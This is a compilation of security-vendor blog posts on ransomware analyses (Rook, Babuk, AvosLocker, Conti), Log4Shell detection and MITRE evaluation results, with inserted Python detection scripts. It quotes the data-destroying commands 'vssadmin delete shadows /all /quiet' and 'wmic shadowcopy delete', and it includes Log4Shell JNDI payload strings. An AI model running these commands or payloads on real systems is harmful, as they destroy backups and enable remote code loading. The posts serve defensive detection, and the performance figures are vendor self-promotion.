MITRE ATT&CK Wizard Spider and Sandworm Evaluation: ReaQta, an IBM company demonstrates Best-in-Class capabilities for Three Years in a row.

MITRE Engenuity has just released the results of the latest round of ATT&CK Evaluations which this year focused on two well-known threat actors: Wizard Spider and Sandworm.

This marks the third time that ReaQta, an IBM Company, has successfully completed the ATT&CK Evaluations with top-quality alerts, showing ReaQta’s capabilities in delivering world-class protection against even the most complex attacks in real-time, without human intervention.

ReaQta’s achievements in this year’s evaluation included the following:

  • 100% Detection coverage across the cyber kill chain.
  • No configuration changes during the evaluation.
  • 100% of detections done in real-time and without delays.

Before diving into the result details, we would like to give a short overview of the MITRE ATT&CK evaluations and the two threat groups Wizard Spider and Sandworm that form the subject of this year’s evaluation as well as the testing environment.

About the Evaluations

MITRE introduced the ATT&CK framework in 2015 as a knowledge base of adversary tactics and techniques, and it has since become the de facto standard framework for cyber security professionals looking to make their organizations more cyber resilient. In 2019 MITRE started the ATT&CK Evaluations to help vendors assess their capabilities against adversary behaviors. Besides the Triton Evaluation in 2021, which focused on ICS vendors, this is the third Evaluation for IT: APT29 (2019), Carbanak + FIN7 (2020), Wizard Spider & Sandworm (2021), and also the third time ReaQta has successfully participated.

This year’s MITRE Evaluation covered two infamous threat groups that have wreaked havoc for many organizations worldwide.

The first threat group in the evaluation, Wizard Spider, is a financially motivated, Russian-speaking criminal group that focuses primarily on extortion through ransomware attacks.

This group has operated the Trickbot botnet (a banking Trojan) since 2016, infecting over 1 million computing devices. They are also the group behind Conti ransomware and started ransomware campaigns in 2018 targeting larger organizations such as hospitals and big corporations. According to the FBI, Wizard Spider extorted USD 61 million through ransomware attacks within just one year.

Sandworm is the second threat group in this year’s evaluation. Sandworm Team is state-sponsored and focuses on destruction of data and system interoperability.

The Russian hacking group has been active since 2009 and operated the NotPetya malware in 2017 in a worldwide attack whose purpose was to destroy data. This attack hit many victims, including Maersk shipping, TNT Express and Merck pharmaceutical; the latter claimed USD 1.3 billion in losses due to interrupted operations. Other infamous attacks attributed to Sandworm include the attacks against Ukrainian electrical companies (2016) and the French presidential campaign (2017). In 2018, the Sandworm Team attacked the Winter Olympic Games in South Korea.

About the Testing Environment

Similar to previous years, NanoOS™, our live hypervisor used to detect high-level malicious behavior, could not be used due to restrictions in the testing environment, and this resulted in several missed detections. Even without this core component, ReaQta was able to achieve 100% detection coverage across the cyber kill chain.

In previous editions we participated with a Linux agent for detections, but this year we opted out of the Linux evaluation, as its results would not represent our upcoming next-generation Linux agent.

100% detection coverage across the cyber kill chain

In both Wizard Spider & Sandworm scenarios, ReaQta autonomously reconstructed the attack activity across the cyber kill chain into a few condensed high-fidelity alerts with meaningful and actionable steps to the analyst. ReaQta detected the most critical events needed for investigation and analysis as well as the key MITRE ATT&CK evaluation objective, Encryption for Data Impact, keeping customers secure.

Why is this Important?

Customers prefer fewer, highly consolidated alerts over many less informative ones. Our approach reduces manual workload and provides a clear picture of unfolding events, with no need to chase attackers across thousands of different security events.

When malicious or suspicious activity is detected, ReaQta switches from smart logging into deep monitoring mode, capturing all events pertaining to the incident and presenting the information in a single consolidated alert. This provides a clear picture of unfolding events, with no need to piece together multiple triggers across thousands of different security events, saving the analyst precious time in triage and incident response.

Experienced analysts understand that not all MITRE ATT&CK techniques have the same importance, and we believe the detections we missed (e.g. system discovery) to be less relevant, even if they are part of the framework describing an attacker step. Every attack leverages a series of techniques, and some techniques have sub-techniques, but not every technique or sub-technique has the same operational importance from the analyst's perspective. Some are significant for the investigation, while others can be deduced logically.

By design, ReaQta does not observe techniques and sub-techniques of lesser importance, and these are evaluated as misses. To increase visibility of techniques and sub-techniques, most EDR solutions rely on API hooking, but this approach is easy for attackers to circumvent and requires frequent updates to maintain operational stability. ReaQta chooses instead to rely on other data sources at different OS layers for its detections, and only collects information that is essential for the analyst to make a difference in investigation and response outcomes.

Even with the NanoOS™ disabled, ReaQta still provides visibility into every stage of the attack life cycle, across the cyber kill chain.

No Configuration changes during the entire evaluation

The MITRE results record the number of configuration changes. Configuration changes are modifications to the product after the first evaluation run, meaning the product was tweaked in order to improve detection results. This year, configuration changes were placed in four main categories: Detection Logic, Data Source, UX and Miscellaneous.

Throughout the evaluation, ReaQta produced all its detections without any configuration changes. Configuration changes help vendors adjust their detections as the attack progresses; most vendors had to tweak their product's 'antennas' multiple times before being able to detect meaningful techniques.

Why is this Important?

In real-life scenarios, configuration changes are usually unrealistic and imply high operational overheads. This was not taken into consideration as part of the evaluation, but it has a significant impact on organizations using the solution: the more configuration a solution requires, the more an organization has to invest in its operation and maintenance. Attackers do not give defenders a second chance to tweak their detections before moving to the next step.

100% of detections done in real-time without delays

The MITRE results also record the number of delayed detections (shown in red in the Configuration Changes + Delayed Detections chart). Delayed detections are detections generated with a delay and not immediately available to the analyst (e.g., because they require sandbox evaluation). Depending on the threat, such a delay may or may not be critical.

Using ReaQta's behavioral analysis engines, all detections were made entirely in real time. Each technique of the attack was tracked as it happened, minimizing the risk of losing important events, instead of waiting for external components to run their analyses.

Why is this Important?

As attackers innovate, automation allows them to move extremely quickly within networks. Operations that used to take minutes or hours now take seconds. The ability to have immediate identification and automated response can be the difference between a threat stopped in its tracks and an organization compromised and having to perform cleanup and recovery operations.

Closing Remarks

With the completion of MITRE ATT&CK round 4, we are ever more sure of our mission and philosophy: capture and present only the information the analyst needs to do their work in the most efficient way possible. This in turn translates to reduced operational costs and a lower overall Mean Time to Respond (MTTR), mitigating the actual cyber risks for organizations.

Acing the MITRE test (i.e., achieving the maximum score) requires monitoring a lot of events, many of which may be unnecessary and result in more false positives, making analysts prone to alert fatigue and causing them to miss meaningful information in a timely fashion. This increased data collection also leads to higher storage costs and affects threat response efficiency.

ReaQta is committed to the MITRE Engenuity ATT&CK Evaluations, which help governments and organizations combat cyber attacks through proven defense practices. We look forward to participating in the next round.

Delivering Security without complexity

ReaQta’s autonomous endpoint detection and response (EDR) platform aims to address the increasing number of businesses falling victim to malicious activity from cyber criminals and nation-state actors. While traditional protection methods fight known threats but remain vulnerable to sophisticated attack techniques, ReaQta’s revolutionary platform stops both known and unknown threats in real time. Through machine learning, the platform continuously refines its definition of normal behavior, tailored to each business and each endpoint, allowing it to detect and block abnormal malicious behavior. ReaQta was recently named a 2020 Cool Vendor by Gartner in Network and Endpoint Security for this unique approach to tackling cyber threats of all forms.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.



The arrival of Windows 11, seamlessly supported by ReaQta

Microsoft has made the Windows 11 operating system available for new machines since October 5, 2021, with the Windows 11 ISO download going live at the same time. This means that anyone can update their existing machine without waiting for a prompt, or choose to do a complete fresh install themselves. According to a note in the Microsoft documentation, Microsoft has also accelerated the offering of Windows 11 to eligible devices.

Through Microsoft’s own machine learning processes, it will automatically determine whether a system can handle a Windows 11 upgrade. The minimum system requirements can be found here.

Windows 11 system requirements

Should the specifications not be met, the operating system components for the upgrade will not arrive, as determined by Microsoft’s machine learning processes. Machines that do not meet the upgrade requirements will continue to function with Windows 10, whose support lifecycle ends on October 14th, 2025. This will be the 10-year mark since the operating system was first introduced.


If you are unsure whether your PC can run Windows 11, download the PC Health Check app to find out.

Does ReaQta Support Windows 11?

At ReaQta, we have made certain that our customers are supported on Windows 11 from day one, out of the box, extending ReaQta’s security suite to Windows 11.

ReaQta agent running on Windows 11 Operating System

The ReaQta Windows agent, version 3.6.1 and above, fully supports Windows 11, providing the same security and performance coverage on Windows 11 as on Windows 10. Devices running an older version of the ReaQta agent should upgrade the agent prior to the Windows 11 upgrade in order to be supported.


Rook Ransomware (RaaS): The latest kid on the block with an attitude.

Rook, the latest kid on the block in ransomware operations, first appeared on VirusTotal on 26 November 2021. Since its discovery, Rook has claimed victims across verticals such as banking, finance, technology and aerospace, and these have been announced on its TOR site. Like most ransomware operations, Rook utilizes a ‘double extortion’ approach to force its victims into payment: the stolen data is displayed as proof of compromise, with accompanying information on the total amount of data stolen.

(Rook Tor Site)

(Victim’s compromised data is displayed on the TOR site)

Analyzing Rook

When executed, Rook encrypts all files, deletes backups via vssadmin.exe and removes itself from the compromised machine. It then leaves a ransom note.

(Rook ransom note)

Rook’s ransom notes state that compromised victims should contact the group within 3 days for the ransom amount to be subject to a “50% discount”. If this condition is not met, the company’s files will be leaked onto the group’s onion site. Contact with the Rook team can be established via e-mail (rook@onionmail.org; securityRook@onionmail.org) or via the TOR browser link. The group also warns that should external help, via software or third-party assistance, be used for decryption and restoration, the private key may be damaged, which would consequently lead to total loss of data.


Running the attack

Upon the execution of the Rook ransomware, ReaQta-Hive autonomously reconstructed the breach, providing complete visibility across attacker tactics and techniques.

(ReaQta-Hive’s Behavioural Tree showing the Rook ransomware)

The behavioral tree maps all processes and behaviors involved in the infection to MITRE ATT&CK tactics and techniques. Rook ransomware also uses the vssadmin.exe delete shadows /all /quiet command to delete shadow volume backups, much like what we have seen from Babuk and Avaddon. While some threat actors do focus on preventing restoration, ReaQta provides an additional layer of defense via DeStra detections on the misuse of wmic.exe and vssadmin.exe.

(Rook is automatically stopped by ReaQta-Hive within seconds)

Within seconds of the infection, ReaQta effectively prevented costly and tiresome business interruptions. Aside from stopping the threat, ReaQta’s AI algorithms automatically terminated all malicious processes involved in the incident; the vssadmin.exe process is also terminated automatically once the threat has been neutralized. Thereafter, ReaQta-Hive closed off the alert, reducing the extra actions needed from the security team.


Cyber threats will only continue to rise globally, given that the return on investment of such ransomware attacks has unfortunately been proven. The aftermath of such infections remains alarming, as an organization’s ‘crown jewels’ are seized and sensitive data is encrypted.

By default, all applications and platforms should be built with security in mind. This includes building security into the organization’s processes in order to protect both the company’s and consumers’ data. Organizations should also ask themselves: are the security solutions they are using able to keep up with the pace of today’s threats? Are employees aware of the potential threats they may encounter?

ReaQta-Hive’s customers stay protected from threats like Rook.


Babuk Ransomware (RaaS): Back-up Deletion and how to stop it

Babuk ransomware was discovered in January 2021 and operated a ransomware-as-a-service (RaaS) model before shutting down its operations in April. The group’s modus operandi is much like that of other RaaS operations: compromising organizations via phishing attempts or vulnerability exploits, such as those used by HAFNIUM, to gain initial access, followed by exfiltration of sensitive data and encryption of key assets. A key focus for the group is to prevent any possibility of data recovery by terminating running applications and back-ups during exfiltration, including deletion of Windows shadow copies and the recycle bin.

Throughout its operations, the group explicitly stated that it would not target hospitals, non-profit charities and schools, or any organizations with annual revenues of less than USD 4 million. Babuk has since shut down its operations and released the full source code of its ransomware builder and decryptor on a hacking forum.


Analyzing Babuk

Upon execution, Babuk encrypts all files on the victim’s machine while deleting backups, preventing file recovery and system restore. This is followed by a ransom note with a link to the Babuk Tor site.

Babuk ransom note

Running the attack

ReaQta-Hive reconstructs the breach, providing complete details of attacker tactics.

ReaQta-Hive’s Behavioural Tree showing the Babuk ransomware

ReaQta-Hive is equipped with ransomware protection capabilities to prevent any potential data encryption on endpoints. Any ransomware behavior is automatically blocked upon detection to ensure that sensitive data is protected.

vssadmin.exe delete shadows /all /quiet command is captured on the behavioral tree

There are several ways ransomware developers can prevent recovery from backups. The most common approach is to delete Shadow Volume Copies via the vssadmin.exe Delete Shadows /All /Quiet command, as captured on the behavioral tree. This command runs the vssadmin.exe utility to quietly delete all Shadow Volume Copies on the machine. Shadow Volume Copies, which are usually taken daily, provide manual or automatic backups or snapshots even when files are in use, allowing organizations to roll Windows back to a previous configuration should the need arise. Ransomware groups such as Babuk design their ransomware to delete Shadow Volume Copies upon infection, preventing their use to recover encrypted files.

“vssadmin.exe” delete shadows /all /quiet command via Command Prompt

Cyber criminals also use wmic.exe shadowcopy delete to delete Shadow Copies. Taking into account the varied mechanisms for backup deletion, ReaQta uses DeStra to monitor vssadmin.exe and wmic.exe activity. DeStra, short for Detection Strategy, is a real-time scripting engine that allows security operators to write custom detection and response rules tailored to the needs and requirements of their business. Should such techniques be employed, DeStra provides real-time alerts to IT security teams and prevents deletion of the backups by terminating the vssadmin and wmic commands.

DeStra detection for process “vssadmin.exe” and “wmic.exe”
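To make the shadow-copy deletion check described for both Rook and Babuk concrete, here is an added Python example (not DeStra or ReaQta code) that applies the same logic to a few constructed process-creation events: it flags vssadmin.exe deleting shadow copies and wmic.exe shadowcopy delete regardless of switch order or casing, ignores benign uses such as vssadmin list shadows, and returns the PIDs a response action would terminate. The event field names, sample events and parent process names are all constructed assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional

# ATT&CK technique that shadow-copy deletion maps to.
TECHNIQUE = "T1490 Inhibit System Recovery"

# Constructed process-creation events (not ReaQta telemetry). A real EDR
# feed would carry at least these fields; parent names are placeholders.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4012, "parent": "malware_sample.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 4013, "parent": "cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "VSSADMIN.EXE Delete Shadows /Quiet /All"},   # recased, reordered
    {"pid": 4014, "parent": "malware_sample.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"pid": 4015, "parent": "svchost.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},                  # benign: read-only
    {"pid": 4016, "parent": "cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption"},                        # benign: inventory
]


@dataclass
class Finding:
    pid: int
    parent: str
    tool: str
    technique: str
    reason: str
    response: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict) -> Optional[Finding]:
    """Return a Finding if the event is a shadow-copy deletion, else None."""
    tool = _basename(event["image"])
    tokens = [t.lower() for t in event["cmdline"].split()]
    # Drop the program name so the switch checks are order-insensitive:
    # "/quiet /all" and "/all /quiet" have the same effect.
    if tokens and _basename(tokens[0]).split(".")[0] in ("vssadmin", "wmic"):
        args = set(tokens[1:])
    else:
        args = set(tokens)

    if tool == "vssadmin.exe" and {"delete", "shadows"} <= args:
        switches = " ".join(s for s in ("/all", "/quiet") if s in args)
        return Finding(event["pid"], event["parent"], tool, TECHNIQUE,
                       f"vssadmin delete shadows {switches}".strip(),
                       "terminate process and alert")
    if tool == "wmic.exe" and {"shadowcopy", "delete"} <= args:
        return Finding(event["pid"], event["parent"], tool, TECHNIQUE,
                       "wmic shadowcopy delete",
                       "terminate process and alert")
    return None


def scan(events: List[Dict]) -> List[Finding]:
    """Run the check over a batch of events, keeping only the hits."""
    return [f for f in (classify(e) for e in events) if f is not None]


def pids_to_terminate(events: List[Dict]) -> List[int]:
    """PIDs of the vssadmin/wmic processes a response rule would kill."""
    return [f.pid for f in scan(events)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"pid={finding.pid} parent={finding.parent} "
              f"{finding.technique}: {finding.reason} -> {finding.response}")
```

In practice the parent process that spawned vssadmin or wmic is the more interesting kill target; the parent field is carried on each finding so a response rule can act on it as well.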

ReaQta-Hive autonomously stops Babuk in the very early attack stages, effectively mitigating business interruptions. ReaQta’s AI automatically terminated all malicious processes and stopped the threat within seconds, before closing the alert to reduce any additional actions required of security teams.

Babuk is automatically stopped by ReaQta-Hive within seconds

As ransomware attacks become more prevalent in today’s threat landscape, organizations should adopt adequate and necessary security measures to future-proof their businesses.



Defend against Log4Shell exploits (CVE-2021-44228) with ReaQta-Hive

A previously unknown vulnerability, CVE-2021-44228, also dubbed Log4Shell, in Apache’s popular logging library Log4j was discovered to have been exploited in the wild for several days prior to its public disclosure on 9 December. Affected versions of Log4j include 2.0-beta9 to 2.15.0. The vulnerability gives an attacker, through simple exploitation, the ability to leverage the Java Naming and Directory Interface (JNDI) from wherever Log4j is used to initiate a request to a malicious server that they control. The simplicity of the exploit and the ubiquity of Log4j in applications allow for widespread attacks across the Internet. While the exploit is exceedingly simple to execute, additional post-exploitation activity is required for an attacker to establish a foothold on targeted networks. ReaQta-Hive provides visibility into unexpected behavior of any application leveraging Log4j, and detects the malicious techniques necessary for post-exploitation behavior.


CVE-2021-44228 exists within Log4j’s feature enabling the use of JNDI. JNDI allows a Java application to look up resources by name. In particular, it allows the use of a service provider interface that can in turn access a directory service such as LDAP. As affected versions of Log4j evaluate a value expression in Java that is sent as logged data, such as ${object.property}, an attacker can include a JNDI lookup containing a request to a directory or naming service within a value expression. For example, by modifying their user agent string (commonly logged by web services) into a value expression, an attacker can trigger Log4j to initiate a request to a server controlled by the attacker.

An often-used example in public discussions of CVE-2021-44228 involves triggering a connection to an attacker-controlled LDAP server. For this, all that is needed is to include an LDAP request in a string representing a value expression, such as ${jndi:ldap://<host>:1389/malicious}. This string then needs to be processed along with any text that is handled by Log4j. Once Log4j handles the data, the value expression is evaluated and eventually the LDAP request is initiated.
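As an added illustration of the defender's side (not code from this post), the following Python scans constructed web-server access-log lines for the kind of value expression described above, reporting the scheme and host of each JNDI lookup found in the request line, referer or user agent, including one that arrives percent-encoded. It recognizes ldap plus the other JNDI URL schemes a lookup can name, so it goes slightly beyond the LDAP case in the text; the log lines, IP addresses and host names are constructed placeholders, and the set of hosts it returns is what an outbound firewall rule would need to block.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set
from urllib.parse import unquote

# Constructed access-log lines in combined log format (not from a real server).
# 203.0.113.0/24 and *.invalid are documentation/placeholder values.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid:1389/a}"
203.0.113.11 - - [10/Dec/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36"
203.0.113.12 - - [10/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${JNDI:rmi://203.0.113.99/obj}"
203.0.113.13 - - [10/Dec/2021:10:00:04 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Flookup.example.invalid%2Fx%7D HTTP/1.1" 200 10 "-" "curl/7.79.1"
"""

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A ${jndi:<scheme>://<host>[:<port>]...} lookup; case-insensitive because the
# lookup prefix is what matters, not how it is capitalised.
LOOKUP_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z0-9+.-]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


@dataclass
class Finding:
    source_ip: str
    field: str          # which logged field carried the lookup
    scheme: str
    host: str
    port: Optional[int]
    raw: str


def find_lookups(field_name: str, value: str, source_ip: str) -> List[Finding]:
    """Return every JNDI lookup expression found in one logged field."""
    # URL-decode first so a percent-encoded ${jndi:...} in the request line
    # is not missed; the application would have decoded it before logging.
    decoded = unquote(value)
    found = []
    for m in LOOKUP_RE.finditer(decoded):
        port = int(m.group("port")) if m.group("port") else None
        found.append(Finding(source_ip, field_name, m.group("scheme").lower(),
                             m.group("host"), port, m.group(0)))
    return found


def scan_log(text: str) -> List[Finding]:
    """Parse combined-format lines and collect lookups from the logged fields."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; other formats need their own parser
        for field in ("request", "referer", "ua"):
            findings.extend(find_lookups(field, m.group(field), m.group("ip")))
    return findings


def outbound_destinations(findings: List[Finding]) -> Set[str]:
    """Hosts a vulnerable application would be induced to contact."""
    return {f"{f.host}:{f.port}" if f.port else f.host for f in findings}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h.source_ip} {h.field}: {h.scheme}://{h.host}"
              f"{':' + str(h.port) if h.port else ''}")
    print("block outbound to:", sorted(outbound_destinations(hits)))
```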


The popularity of Log4j, with services ranging from web and desktop applications to database and indexing services, provides an enormous attack surface on the Internet. The simplicity of exploitation (for example, simply sending HTTP requests with modified user agent strings to any web service) allows attackers to easily scale out attacks across the Internet.

Still, an attacker has not finished establishing a foothold upon successful exploitation. For this, the affected server leveraging Log4j must be able to initiate an outbound request to the attacker-controlled server, thereby delivering payloads for additional stages of the attack chain. The exploit can also be used for other arbitrary remote command execution, but other vectors after exploitation would require more knowledge of the targeted environment. These additional requirements force an attacker to conduct activity that would be visible to any effective EDR solution.

Identify attacks with ReaQta-Hive

With ReaQta-Hive, use of the exploit to push a connection attempt to a malicious server shows up as unexpected network activity from the vulnerable application using an affected version of Log4j.

For example, exploiting a desktop application to contact a malicious LDAP server will show the application establishing an LDAP connection in ReaQta-Hive’s telemetry. The follow-on activity required by the attacker does not change: executing malicious payloads on targeted servers or leveraging post-exploitation techniques and procedures means the detection and remediation capabilities are not evaded.

CVE-2021-44228 will certainly remain a widespread problem for the foreseeable future. The number of applications which leverage Log4j is enormous, and additional vulnerable applications will likely continue to be publicly disclosed. However, there are a number of significant mitigations aside from developers upgrading to a fixed version of Log4j (currently version 2.17.0). Restricting unnecessary outbound ports at the firewall level can prevent the initiation of malicious requests to external LDAP servers.

Monitoring endpoints and servers with an effective EDR platform that can both identify suspicious activity and remediate upon detection will also prevent follow-on activity by attackers attempting to exploit CVE-2021-44228.

IBM to Acquire ReaQta

An event of this magnitude requires more than my usual few lines on LinkedIn: we have entered into an agreement to be acquired by IBM.

For the past 7 years, we’ve worked hard to create an environment that fosters innovation and promotes new ideas; we’ve challenged the “usual way of doing things” and arrived at new concepts, ideas, workflows and technologies. Most of what we ended up creating emerged from our own constraints and desire to build a process that was efficient and more machine-driven. We never liked the idea of solving problems by hiding them behind the now proverbial RFoP (Room Full of People); we felt like it was cheating and wanted to make sure that all the tedious or time-sensitive tasks were taken over – to the maximum extent possible – by algorithms. For us, A.I. and Machine Learning were never buzzwords but a means to an end.

The result was a solution, ReaQta-Hive, that I personally loved from day one, as it embodied our core values: simplicity and automation. Building an “easy-to-use” business solution is definitely a difficult task. Finding the balance between how much data to show and how much you choose not to, in order to avoid information overload, is incredibly difficult. How do you select what’s important? How do you decide what isn’t? We’re dealing with sophisticated threats, where nothing is certain and everything is new, so drawing the line is often difficult. Our secret weapon has always been a team of incredibly gifted talent that we have carefully selected – and many times they have chosen us! – over the years. We’ve always made sure to keep the conversation going between all departments, and these exchanges have worked very well to plant the seeds for brilliant new ideas.

All those efforts eventually paid off: Gartner named us Cool Vendors in October 2020, we successfully managed several MITRE rounds, and our customer base continued to grow at a steady pace. Shortly thereafter, when the conversation with IBM began, the security team shared their ideas and strategy with us and everything aligned perfectly. Discussion after discussion, it became clear that the direction we had taken and the direction IBM had chosen were really the same (net of a difference in scale factor, of course ;). And here we are today.

I’m excited about what’s coming next and also incredibly proud. The idea of participating in the creation of QRadar XDR, on such a large scale, is incredibly rewarding and is also a strong validation of the technology we have developed. I’m proud, because this is the result of a fantastic team that managed to remain cohesive, reliable, inventive and vibrant, even as the world was changing and we moved from bustling offices to the tranquility of our living rooms.

In IBM we will join forces with top talent from around the world, a unique opportunity for our team to be exposed to the best and most creative minds and continue to innovate faster than we ever thought possible. This is the beginning of an exciting new journey to change the way we think about cybersecurity, and I’m excited about what lies ahead!

Cover image shamelessly stolen from Christopher Meenan’s LinkedIn post.

Alberto Pelliccione

AvosLocker Ransomware (RaaS): A New Ransomware Group Emerges

AvosLocker recently made headlines as a new ransomware-as-a-service (RaaS) that commenced operations in June, represented by a purple bug logo. Operating with a modus operandi similar to most RaaS, AvosLocker has started promoting its RaaS program via various dark web forums in its search for affiliates. AvosLocker’s primary mode of malware delivery is through spam email campaigns and online advertisements. After a successful compromise, AvosLocker offers technical assistance to victims, providing support to recover the compromised systems. As seen on its Tor site, AvosLocker uses 256-bit custom AES encryption and appends the extension .avos to encrypted files. Victims are then led to a landing page to begin negotiations with the AvosLocker team.

AvosLocker Tor Site

Analyzing AvosLocker

AvosLocker ransom note

Upon execution, AvosLocker encrypts files on the victim’s machine and disables file recovery and system restore. A ransom note is left on the victim’s machine, which includes a link and a corresponding ID for access to the AvosLocker Tor site.

AvosLocker payment page

Once access is granted, AvosLocker provides a clean user interface that displays four main components:

  1. Countdown Timer – Displays the time left before the ransom is doubled.
  2. Test Decryption – A feature that allows victims to upload an encrypted sample file to check whether it can be successfully decrypted.
  3. Support Bot – A chat feature that gives victims the ability to interact with the AvosLocker group and is used for negotiations and payment support-related matters.
  4. Payment Information – A QR code is provided for the payment address, with the ransom denominated in the cryptocurrency XMR (Monero).

AvosLocker is paid via MONERO cryptocurrency

Subsequently, should the owner of the data choose not to pay the ransom, the AvosLocker group puts the victim’s data up for sale via a press release.

AvosLocker Press Release Onion Service on the Tor network (captured October 20, 2021)

Within seconds of an infection, ReaQta-Hive is able to reconstruct the complete breach, providing full details of attacker tactics.


Running the attack

ReaQta-Hive’s Behavioural Tree showing the AvosLocker ransomware

ReaQta-Hive is equipped with ransomware protection capabilities to prevent any potential data encryption on endpoints. Any ransomware behaviour is automatically blocked upon detection to ensure that sensitive data is protected.

AvosLocker is automatically stopped by ReaQta-Hive within seconds

ReaQta-Hive was able to autonomously stop AvosLocker in very early attack stages, effectively mitigating any business interruptions. ReaQta’s AI automations terminated all malicious processes and stopped the threat within seconds, then closed off the alert to reduce any additional actions required of security teams.


Ransomware attacks will only continue to surge globally. Organizations and their security leaders should already have security and mitigation plans in place to ensure that their sensitive data stays safe from destructive malware.


Conti Ransomware (RaaS): A New Wage-Paying Affiliate Model

The Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Sep 22 on the Conti ransomware group, providing detailed information regarding its exploits and affiliates. Together with the Federal Bureau of Investigation (FBI), they have seen Conti ransomware in over 400 attacks targeting international enterprises. A PDF version of the advisory, which contains a technical breakdown of the ransomware group and the mitigation steps, is available here.

While operating as a ransomware-as-a-service, Conti provides a different compensation structure from typical affiliate models. According to CISA, Conti has devised a wage-paying scheme for deployers of the ransomware, instead of only paying a fractional share of the proceeds from a successful compromise. While other RaaS models like LockBit 2.0, BlackMatter and RansomEXX pay affiliates only when a breach is successful, Conti lowers the barrier for malicious insiders or disgruntled employees to launch ransomware. This greatly incentivises deviant behavior, as potential insiders get paid at the onset, even if the attack is unsuccessful.


Analyzing Conti
Conti Recovery Service Tor Site

Conti actors use a wide range of tools and methods to gain initial access into organizations, including targeted spear-phishing campaigns with custom-crafted emails that carry malicious attachments or links; these often contain embedded scripts used to download or drop other malware.

Other common methods of entry include stolen or weak Remote Desktop Protocol (RDP) credentials, phone calls, illegitimate software, other malware distribution networks and common vulnerabilities in external assets.


According to a leaked Conti ransomware playbook, Conti actors exploit vulnerabilities such as “PrintNightmare” in unpatched assets to escalate privileges and move laterally across a victim’s network. Once the victim’s data has been stolen and encrypted, a double extortion technique is employed, demanding a ransom in exchange for the encrypted information. The victim is then threatened with the public release of the data should ransom be left unpaid.

Conti ransom note

Running the attack

ReaQta-Hive reconstructs an entire breach within seconds of an infection, providing the full details of the attack behaviours and techniques used.

ReaQta-Hive’s Behavioural Tree showing the Conti ransomware

Built with ransomware protection capabilities, ReaQta-Hive autonomously blocks ransomware once any ransomware behavior is exhibited to prevent any potential data encryption on the endpoint.

Conti is automatically stopped by ReaQta-Hive within seconds

ReaQta automatically stopped Conti within seconds, effectively mitigating the risks of any business interruptions and downtime. In addition to stopping the threat, ReaQta’s AI automations autonomously terminated all malicious processes and closed off the alert, reducing any extra actions required of the security team.

As ransomware attacks continue to grow to become one of the greatest security challenges for organizations globally, it is imperative that security leaders prioritize having mitigation plans ready so that swift action can be taken.

CISA recommends the following actions to reduce the risk of compromise by a Conti ransomware attack: 

  1. Ensure multi-factor authentication (MFA) is enabled across the organization.
  2. Ensure network segmentation is in place, using demilitarized zones (DMZs) and network traffic management controls, to prevent ingress and egress communications with known malicious IP addresses. Implement strong spam filters and conduct regular user training programs to enforce proper cyber hygiene.
  3. Ensure assets and software are routinely patched and updated.
  4. Use application allowlisting to prevent employees from installing illegitimate applications or unauthorized software that contravenes the organization’s security policy. Implement execution prevention by disabling macro scripts in Microsoft Office files transmitted via email.
  5. Implement endpoint detection and response (EDR) tools. EDR tools like ReaQta-Hive provide unparalleled visibility into the security status of endpoints and proactively secure organisations against malicious cyber actors.
  6. Control access to resources over the network, e.g. by restricting RDP.
  7. Ensure user accounts are properly configured with the right access controls and privilege rights, and check logs to ensure account holders are legitimate users.

To learn more about what makes ReaQta unique, please visit Why ReaQta and apply for a demonstration.

Remote code execution vulnerability CVE-2021-40444 could become the next prolific cyber crime tool. Here’s how to stay ahead of such exploits.

A recently discovered exploit targeting a vulnerability in Microsoft’s internal browser engine, MSHTML, could become a prolific tool for cyber criminals in both targeted and widespread campaigns. CVE-2021-40444, a remote code execution vulnerability in Microsoft’s MSHTML browser engine, was disclosed by Microsoft in a 07 September 2021 advisory [1], but a malicious document involved in the exploit chain had been discovered separately by security researchers a week earlier. Public analysis of the document has led to the creation of multiple proofs of concept of the exploit, which are now widely available. Despite the availability and ease of use of the exploit, any attack chain involving it will generate noticeably anomalous behavior on the target machines.

According to Microsoft’s 15 September analysis of the exploit chain [2], attacks involving the exploit were first observed in August 2021, when emails posing as legal agreements led the victim to the malicious document on a file-sharing site. Once the document was opened, malicious JavaScript contained in another remotely hosted file was loaded via an external OLEObject relationship. The exploit allowed the attack to circumvent Protected Mode in Microsoft Office, so no additional interaction by the victim was required. From there, a remotely hosted CAB file containing a DLL posing as an INF file was downloaded, decompressed, then loaded, which in turn fetched a custom Cobalt Strike Beacon loader.
